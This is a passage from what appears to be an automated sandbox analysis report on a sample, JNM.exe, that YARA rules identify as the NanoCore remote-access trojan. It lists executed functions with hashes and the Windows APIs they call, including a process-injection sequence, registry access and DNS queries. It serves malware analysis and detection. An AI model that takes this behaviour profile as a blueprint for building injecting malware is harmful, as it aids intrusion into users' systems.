            • Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            Chronological Activities

            Disassembly

            Code Analysis

            Reset < >

              Analysis Process: JNM.exe PID: 1692 Parent PID: 2424 JNM.exeCOMMON

              Executed Functions

              Function 00404881, Relevance: 14.9, Strings: 10, Instructions: 2446COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID:
              • String ID: .@l$.@l$anz$fCl$fCl$fCl$fCl$fCl$fCl$gsanz
              • API String ID: 0-851372209
              • Opcode ID: cf53a9a1fd0ed02e541fa6830c2a229b550a9f91460d7f8f5986c7fd1f708fc4
              • Instruction ID: f4a5d3cd86b99b46ed2691f001bc14ac6b6f7b1151910ec8f202ffff01178f15
              • Opcode Fuzzy Hash: cf53a9a1fd0ed02e541fa6830c2a229b550a9f91460d7f8f5986c7fd1f708fc4
              • Instruction Fuzzy Hash: 24133034A14200CECB25AF50C558D1A7BB3FF46304B1690EBD12A9F772D37AC999CB5A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404BE8, Relevance: 14.7, Strings: 10, Instructions: 2163COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID:
              • String ID: .@l$.@l$anz$fCl$fCl$fCl$fCl$fCl$fCl$gsanz
              • API String ID: 0-851372209
              • Opcode ID: 9826635ddaad68c1f8db911eba824faa78bb57ebc5a4239fff0b4579aabbd391
              • Instruction ID: e649f8707191c1cdafeec83558f6e157637246842114e215e6be937c4c6418b0
              • Opcode Fuzzy Hash: 9826635ddaad68c1f8db911eba824faa78bb57ebc5a4239fff0b4579aabbd391
              • Instruction Fuzzy Hash: 0F032D35A10200CECB29AF40C558D1EB7B3FF46304B1690AAD12A5F776D376C9A9CB5E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00408E03, Relevance: 1.6, APIs: 1, Instructions: 84nativethreadCOMMON
              Download Yara Rule
              APIs
              • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,00408D77,00000000,00000000), ref: 00408EC8
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: InformationThread
              • String ID:
              • API String ID: 4046476035-0
              • Opcode ID: 9b6a392a82ce3c3c0e5bfae9959584f035b886510c63327f34874e6bfd45ab50
              • Instruction ID: 8de14ecb07c70bf74ecfaa5fffb8ef97ecaaa87ddd45f220c494f593cbf144c9
              • Opcode Fuzzy Hash: 9b6a392a82ce3c3c0e5bfae9959584f035b886510c63327f34874e6bfd45ab50
              • Instruction Fuzzy Hash: A8314771900208CFDB10CFA8D9447DEBBF1FB88324F24852AD555B7290CB799981CFA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00400AC4, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
              Download Yara Rule
              APIs
              • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,00408D77,00000000,00000000), ref: 00408EC8
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: InformationThread
              • String ID:
              • API String ID: 4046476035-0
              • Opcode ID: d99e38a137619d51b7d44d0067d08c359c0932bd5cb38ce8d4a0bd34490acf8e
              • Instruction ID: c67927ef5e4c3b04507dda0c235f1d5765ffb63f180cc48412d1dd52ed2ebebb
              • Opcode Fuzzy Hash: d99e38a137619d51b7d44d0067d08c359c0932bd5cb38ce8d4a0bd34490acf8e
              • Instruction Fuzzy Hash: 101126B5900609DFCB10CF99D448BDFBBF4EB48310F20882AE558B7250C774A944CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00250068, Relevance: 6.3, Strings: 5, Instructions: 60COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2355912758.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
              Similarity
              • API ID:
              • String ID: fCl$fCl$fCl$fCl$fCl
              • API String ID: 0-2453322616
              • Opcode ID: 8e6847e16284ad3cfa0407a7869cd211bc388541e9aaf2c97585e57813f75dce
              • Instruction ID: ee9f7d8ae93dcc30aa31bf687941104fc6f5a248a5e73fec257f0d312110caec
              • Opcode Fuzzy Hash: 8e6847e16284ad3cfa0407a7869cd211bc388541e9aaf2c97585e57813f75dce
              • Instruction Fuzzy Hash: 4001843134012417D658B239AD57F3F22AFD7C5A90F108539BA1A9F3E9CFA49D4623A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040A450, Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040A68E
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 55c7a8a1fbe4768e6791eed2433907932b7a501f94a3d825809eeec95db66958
              • Instruction ID: 822d3d4873d766ab20c08fe8589355f5d44a1dd4ba3f1a921f380c7696e91dc9
              • Opcode Fuzzy Hash: 55c7a8a1fbe4768e6791eed2433907932b7a501f94a3d825809eeec95db66958
              • Instruction Fuzzy Hash: 2DA12671D003199FDB14CFA4C841BEEBBB2BF48314F14856AD809B7280DB789995CF96
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040A458, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040A68E
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 26f942d70aad7b368154a835a190095663e1582c1ba79d049a7f0bb1c79d2354
              • Instruction ID: 13d2c6f128fc0d14b9dcb57c5e7883eefe5982e2e2785f815e3a48d45b802ba9
              • Opcode Fuzzy Hash: 26f942d70aad7b368154a835a190095663e1582c1ba79d049a7f0bb1c79d2354
              • Instruction Fuzzy Hash: F9912571D003199FDB14CFA4C841BEEBBB2BB48314F14856AE809B7280DB789995CF96
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040B718, Relevance: 1.7, APIs: 1, Instructions: 230COMMON
              Download Yara Rule
              APIs
              • KiUserExceptionDispatcher.NTDLL ref: 0040B797
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: DispatcherExceptionUser
              • String ID:
              • API String ID: 6842923-0
              • Opcode ID: 0abd5befc275d384b3d3674108deb9d6417dee39d3b5fc71d8778753e1551258
              • Instruction ID: c15a57059d5d42b464d884b4f48e96bdccb54c52f906bcccb59a745beaef5967
              • Opcode Fuzzy Hash: 0abd5befc275d384b3d3674108deb9d6417dee39d3b5fc71d8778753e1551258
              • Instruction Fuzzy Hash: 1BA10A71E001498BDB04CFA9D984BDDBBB2EF84359F18802AD005BB795D73D9885CF68
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040B44E, Relevance: 1.7, APIs: 1, Instructions: 184COMMON
              Download Yara Rule
              APIs
              • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 0040B6C6
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: KernelObjectSecurity
              • String ID:
              • API String ID: 3015937269-0
              • Opcode ID: 945ffcaf1e847979c42d877b010b5895c61ae483552c24677d3d9561e101fb83
              • Instruction ID: 2fca9e88585982d384cacbf4724978f7e4156fcc59705cc6f21cd363428c10db
              • Opcode Fuzzy Hash: 945ffcaf1e847979c42d877b010b5895c61ae483552c24677d3d9561e101fb83
              • Instruction Fuzzy Hash: DE61CAB1D002488FCB04CFB9D8547EEBBB1EF89314F14856AE455AB391DB389941CFA6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040B707, Relevance: 1.7, APIs: 1, Instructions: 156COMMON
              Download Yara Rule
              APIs
              • KiUserExceptionDispatcher.NTDLL ref: 0040B797
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: DispatcherExceptionUser
              • String ID:
              • API String ID: 6842923-0
              • Opcode ID: ff2b37b236835f285b779dd5b9d3f7347ecc630d7e2268ca88dc4af6a4699f2b
              • Instruction ID: 6cd2bc8f13642d963f9eb33f08b9c3c5773600dede291dff86fb453b5808d123
              • Opcode Fuzzy Hash: ff2b37b236835f285b779dd5b9d3f7347ecc630d7e2268ca88dc4af6a4699f2b
              • Instruction Fuzzy Hash: DF612870E001498BDB04CFA9D984ADDBBB2FF88319F14812AD001BB795D7399885CF68
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040A1D0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
              Download Yara Rule
              APIs
              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0040A260
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: f2584ff75ca748a7167056b6d48e1e88996a2315a9960877bad94cb3762afd60
              • Instruction ID: e225c277e6d6a8f08c9f8a94a5fdeb651f119bb3983dac86886a6e5e796bb343
              • Opcode Fuzzy Hash: f2584ff75ca748a7167056b6d48e1e88996a2315a9960877bad94cb3762afd60
              • Instruction Fuzzy Hash: 3D2135719003099FCB10CFA9C884BEEBBF5FF48314F10882AE918A7340C7789954CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040A030, Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
              Download Yara Rule
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0040A0B6
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: 35c7497e1276d2c76749c7449cf8d11c39801394c8ce9466ab1ab05ce3f2f33a
              • Instruction ID: c0321c2e5e5ae9d1651c8788627e8ba0e721c51835cad0ab23f4ff957b84588c
              • Opcode Fuzzy Hash: 35c7497e1276d2c76749c7449cf8d11c39801394c8ce9466ab1ab05ce3f2f33a
              • Instruction Fuzzy Hash: 5E213771D002098FDB10CFA9C4847EEBBF5AF89314F24882ED559A7280C7789945CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040B640, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
              Download Yara Rule
              APIs
              • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 0040B6C6
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: KernelObjectSecurity
              • String ID:
              • API String ID: 3015937269-0
              • Opcode ID: 480e0b42b2540dc69c632445a47121a4f1624a3f0becbe09d84b8410aa1c849c
              • Instruction ID: a0870c74f60b53d827b22485cc021cd8a14cfd423b6b684173ed9472c7b96995
              • Opcode Fuzzy Hash: 480e0b42b2540dc69c632445a47121a4f1624a3f0becbe09d84b8410aa1c849c
              • Instruction Fuzzy Hash: F92125B1D102498FCB10CFA9D484BEEBBF4EF89314F14892AE459A7340D778A944CFA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040A038, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
              Download Yara Rule
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0040A0B6
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: ab4a69d5dadfc577d985ca60456e1b23b0eb2ffbd74f38251962302b0031e107
              • Instruction ID: 27f96187c060396e80d552c7cd75590ec16ec328a38ca88105a90f27eb82fa67
              • Opcode Fuzzy Hash: ab4a69d5dadfc577d985ca60456e1b23b0eb2ffbd74f38251962302b0031e107
              • Instruction Fuzzy Hash: A5210771D003098FDB10DFAAC4847EEBBF5AF49314F54882AD559A7240D778A944CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040A2C0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
              Download Yara Rule
              APIs
              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0040A340
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: 9c33a36e15228dbaafbe3489ba2152295c8032792dbadee4269079c0b031ab5a
              • Instruction ID: 6bceb098db00d19fb0e4ca13e71feca0f38d29e29a6ef6fe030fe627ae2e66c6
              • Opcode Fuzzy Hash: 9c33a36e15228dbaafbe3489ba2152295c8032792dbadee4269079c0b031ab5a
              • Instruction Fuzzy Hash: 83212871D003099FCB10CFA9C8446EEFBF5FF48314F54882AE959A7240D778A954CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040B648, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
              Download Yara Rule
              APIs
              • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 0040B6C6
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: KernelObjectSecurity
              • String ID:
              • API String ID: 3015937269-0
              • Opcode ID: 723c88a13e2ddac087295c17e881ea2cec9856b636be6d2a88c86a3542e5f6ac
              • Instruction ID: a9c8cb7ee7e408d7e4c5b695b9b99a56ab018b83941bbcb479e1147c7f1d4007
              • Opcode Fuzzy Hash: 723c88a13e2ddac087295c17e881ea2cec9856b636be6d2a88c86a3542e5f6ac
              • Instruction Fuzzy Hash: C62118B19002498FCB10CF99C484BEEBBF4EF88314F14842AE518A7340D778A944CFA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040A10A, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
              Download Yara Rule
              APIs
              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0040A17E
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: c48ab618b11b0e82144bd296b197d8f6c5e997bf670641fba340a145f98ea1d5
              • Instruction ID: f4e175f5b478ebfb2765cf55e677c00c7a54345f62fc86af34a88bfbb1b97402
              • Opcode Fuzzy Hash: c48ab618b11b0e82144bd296b197d8f6c5e997bf670641fba340a145f98ea1d5
              • Instruction Fuzzy Hash: 2C111775D002099BDF10CFA5D8447EFBBF5AF88314F14881AE919A7250C7799554CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040A110, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
              Download Yara Rule
              APIs
              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0040A17E
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: c331aefc6807769a65d2b7004f488e84bf72fb08861e2008dcb8ccd7952d412c
              • Instruction ID: bc5f7657a9b01b1e0c7e0d59ded973acb3b94043223a73838253233d3dd79b12
              • Opcode Fuzzy Hash: c331aefc6807769a65d2b7004f488e84bf72fb08861e2008dcb8ccd7952d412c
              • Instruction Fuzzy Hash: 9C113771D002099FCF10CFA9D8447EFBBF5AF88314F14881AE919A7250C779A954CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040A818, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.2356048794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 959e7a81fd0d4abdb876c4031582caf5c6f44bd48ad6dc2c679e0d922bfa295f
              • Instruction ID: 1f444f08eb689ab322d75b3d09064fbb6c876a4f13d9cfeb9cb01931fbe07fd4
              • Opcode Fuzzy Hash: 959e7a81fd0d4abdb876c4031582caf5c6f44bd48ad6dc2c679e0d922bfa295f
              • Instruction Fuzzy Hash: 28113AB1D003098BCB10DFAAD4447EFFBF9AF88314F24882AD519B7240C778A944CB95
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Analysis Process: JNM.exe PID: 2304 Parent PID: 1692 JNM.exeCOMMON

              Executed Functions

              Function 00445390, Relevance: 1.7, APIs: 1, Instructions: 187registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryValueExA.KERNEL32(00000000,00445879,00020119,00000000,00000000,?), ref: 00445C4F
              Memory Dump Source
              • Source File: 00000007.00000002.2356032992.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 326f41d54f83e61e1a2051efc42b49802c22705f46b3f56db17907769401dc02
              • Instruction ID: a7f7d28169830209868432ddf872191f00aff43cdb558ff00dbc1305036e1f35
              • Opcode Fuzzy Hash: 326f41d54f83e61e1a2051efc42b49802c22705f46b3f56db17907769401dc02
              • Instruction Fuzzy Hash: B1711770E006599FEF14CFA9C884B9EBBB1FF48314F24852AE815A7351DB74A842CF95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00445A85, Relevance: 1.7, APIs: 1, Instructions: 186registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryValueExA.KERNEL32(00000000,00445879,00020119,00000000,00000000,?), ref: 00445C4F
              Memory Dump Source
              • Source File: 00000007.00000002.2356032992.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 7fee4907a4bd4dfd49c59108f551e756984438fcb9c2fac6757595b3f2525a16
              • Instruction ID: e117ec2696b7081ebee414fd906398ce9e437a524591917ecea39d84aa239222
              • Opcode Fuzzy Hash: 7fee4907a4bd4dfd49c59108f551e756984438fcb9c2fac6757595b3f2525a16
              • Instruction Fuzzy Hash: 0B811570E006599FEF14CFA8C884B9EBBB1FF48314F24852AE855A7352DB74A841CF95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 006F1658, Relevance: 1.6, APIs: 1, Instructions: 139networkCOMMON
              Download Yara Rule
              APIs
              • DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 006F1780
              Memory Dump Source
              • Source File: 00000007.00000002.2356414746.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false
              Similarity
              • API ID: Query_
              • String ID:
              • API String ID: 428220571-0
              • Opcode ID: 9cddfb7ad1ca5dae3027eab48cb4180115b74b746b89093eeb658a941e57185d
              • Instruction ID: 913800a7ca2bf88b115fe0168aa68c4aba82b9e6ab94cbf17687deb9643532b4
              • Opcode Fuzzy Hash: 9cddfb7ad1ca5dae3027eab48cb4180115b74b746b89093eeb658a941e57185d
              • Instruction Fuzzy Hash: 5B51F371D0024DDFDB14CFA9C884AEEBBB6FF49304F24852AE918AB250DB715946CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00441484, Relevance: 1.6, APIs: 1, Instructions: 102registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,?,?), ref: 004459F7
              Memory Dump Source
              • Source File: 00000007.00000002.2356032992.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: cd92e8a7931b82644841173f737d38460f57edd05f31631e75b0eb5e21739caa
              • Instruction ID: 01696c0a7ad1596b3a613873566d02dc910027e283b28d3a7e6fe444d86bd76d
              • Opcode Fuzzy Hash: cd92e8a7931b82644841173f737d38460f57edd05f31631e75b0eb5e21739caa
              • Instruction Fuzzy Hash: 734134B1D00658DFEF10CF99C885B9EBBF1BF48314F14852AE818AB351D7789845CB95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004478AD, Relevance: 1.6, APIs: 1, Instructions: 101fileCOMMON
              Download Yara Rule
              APIs
              • DeleteFileA.KERNELBASE(?), ref: 0044798C
              Memory Dump Source
              • Source File: 00000007.00000002.2356032992.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: ecb1f6b47d6ba37b2ad9edfe2ab8ca0f003a29caab6fb6bbca449e97260f56c5
              • Instruction ID: 33a714c55385d85a7f0f082954163241196c1f3a16c33f768480f02a3689c31f
              • Opcode Fuzzy Hash: ecb1f6b47d6ba37b2ad9edfe2ab8ca0f003a29caab6fb6bbca449e97260f56c5
              • Instruction Fuzzy Hash: 244165B1D042599FEB10CFA9C885BEEBBF5EF48304F14852AE854A7380D7789846CB95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0044590F, Relevance: 1.6, APIs: 1, Instructions: 99registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,?,?), ref: 004459F7
              Memory Dump Source
              • Source File: 00000007.00000002.2356032992.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: 7c5a11a05f9c52877a4b9c08a1ebcdd2ee6ded18bf896a0661e8a9e29462c6ce
              • Instruction ID: 5c5a33260cdff1571143d9763b1e85396f96b9e20a9303d4149409646134a0e9
              • Opcode Fuzzy Hash: 7c5a11a05f9c52877a4b9c08a1ebcdd2ee6ded18bf896a0661e8a9e29462c6ce
              • Instruction Fuzzy Hash: E54132B1D00658DFEF10CFA9C885A9EBBB1BF48314F24812AE818AB351C7789845CF95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004478B8, Relevance: 1.6, APIs: 1, Instructions: 94fileCOMMON
              Download Yara Rule
              APIs
              • DeleteFileA.KERNELBASE(?), ref: 0044798C
              Memory Dump Source
              • Source File: 00000007.00000002.2356032992.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 9884247fe701ec0f2e7eabd5623de188661f63a773046209a7ccc6cd8aa5d7a5
              • Instruction ID: 6a2d3f87ba258e05e05648468eb2be0d51c206c45feab180c464f706563e528a
              • Opcode Fuzzy Hash: 9884247fe701ec0f2e7eabd5623de188661f63a773046209a7ccc6cd8aa5d7a5
              • Instruction Fuzzy Hash: D84142B1D046599FEB10CFA9C885B9EBBF5AF48304F24852AE814A7380D7789846CF95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00445D29, Relevance: 1.5, APIs: 1, Instructions: 49registryCOMMON
              Download Yara Rule
              APIs
              • RegCloseKey.KERNEL32(00000000), ref: 00445D8F
              Memory Dump Source
              • Source File: 00000007.00000002.2356032992.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 56ab8b0ff045f14c52f8c094387f72d6a47e295f985ece1cd989fd94196d4936
              • Instruction ID: 8e1044cbc93b286a384354f8fb72f4beb3815003c95e92aae5748e81a43d921c
              • Opcode Fuzzy Hash: 56ab8b0ff045f14c52f8c094387f72d6a47e295f985ece1cd989fd94196d4936
              • Instruction Fuzzy Hash: 6A1134B1C002498FCB10CF99D848BDEFBF8EF89314F24885AD958A7200C374A905CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0044539C, Relevance: 1.5, APIs: 1, Instructions: 48registryCOMMON
              Download Yara Rule
              APIs
              • RegCloseKey.KERNEL32(00000000), ref: 00445D8F
              Memory Dump Source
              • Source File: 00000007.00000002.2356032992.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 4e9a730659645f1a087eca1b69aedde60fbac4717f9427c77d20c9771f73aac3
              • Instruction ID: c72d007f1604a3334d0e8a805c5183e0fedd22dea903f8e04ad4b0dda03fecc6
              • Opcode Fuzzy Hash: 4e9a730659645f1a087eca1b69aedde60fbac4717f9427c77d20c9771f73aac3
              • Instruction Fuzzy Hash: E311F0B1D00609CFDB10CF99D448B9EBBF8AB49314F20881AD518A7240C779A945CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00445EB0, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
              Download Yara Rule
              APIs
              • GetForegroundWindow.USER32 ref: 00445F0C
              Memory Dump Source
              • Source File: 00000007.00000002.2356032992.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
              Similarity
              • API ID: ForegroundWindow
              • String ID:
              • API String ID: 2020703349-0
              • Opcode ID: 138a4b9780720e6c9b2bfd70e976b5811538fda8951f3221d1b97f0f954bdbef
              • Instruction ID: 7d214a20612150137248ad446d7bc82f243f242775ab801797b4fe1a5bc50bd4
              • Opcode Fuzzy Hash: 138a4b9780720e6c9b2bfd70e976b5811538fda8951f3221d1b97f0f954bdbef
              • Instruction Fuzzy Hash: 6711FEB5D006098FDB10CF99D488BDEFBF4EB48314F20881AD928A7300C378A944CFA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0028D01C, Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.2355873945.000000000028D000.00000040.00000001.sdmp, Offset: 0028D000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ee150be70e5be8c84718ec6aac04ba9d0c024a4f53efe76f81d638bb3afcf2ba
              • Instruction ID: 8cea5b3eeca5fbf79540f10b8e12dca721080d8edcc3d386c02dbcbd7e9e432b
              • Opcode Fuzzy Hash: ee150be70e5be8c84718ec6aac04ba9d0c024a4f53efe76f81d638bb3afcf2ba
              • Instruction Fuzzy Hash: 7521F279614204DFDB14EF60E984B16BBA5EB84318F24C969D8094B2C6C776D82BCBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0028D1D4, Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.2355873945.000000000028D000.00000040.00000001.sdmp, Offset: 0028D000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2686edca3cbcd0a1f017007e3cdd5f7a3c2e3952b3e2ba92bee0a3c8b78e470a
              • Instruction ID: 123f32f336bed709d7dee89f8a781bc0242a7c377d25d00e0772b795e133090d
              • Opcode Fuzzy Hash: 2686edca3cbcd0a1f017007e3cdd5f7a3c2e3952b3e2ba92bee0a3c8b78e470a
              • Instruction Fuzzy Hash: 7821F579614204DFDB05EF50D580B16BBA5FB84314F24C96DDC094B2CAC376D82ACB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0028D1CF, Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.2355873945.000000000028D000.00000040.00000001.sdmp, Offset: 0028D000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 53477353790cdefaedfc221285acf2dbb3c11961671178482a9ce8496e36c9d6
              • Instruction ID: 36d529ba86a4809ec5c15633fbf2debe471a8fac2ff58c706014b550d49d49f4
              • Opcode Fuzzy Hash: 53477353790cdefaedfc221285acf2dbb3c11961671178482a9ce8496e36c9d6
              • Instruction Fuzzy Hash: 0911BB79944280DFDB02DF10D5C4B15BBA1FB84314F28C6ADDC094B29AC33AD82ACB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0028D017, Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
